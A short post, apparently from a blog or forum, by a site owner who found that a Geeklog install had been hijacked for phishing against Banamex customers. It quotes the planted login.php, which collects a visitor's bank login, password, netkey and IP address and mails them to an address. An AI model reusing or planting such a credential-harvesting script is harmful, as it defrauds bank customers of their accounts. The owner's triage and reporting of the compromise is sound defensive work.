I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:
$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");
//sending email info here
$subj = "Bancanet - Banamex";
$from = "From: Info
mail("email@example.com", $subj, $message, $from);
My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verficacion.htm:
How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":
Anyone know anything about this?
Update: Here's the phishing alert. It's from 2005.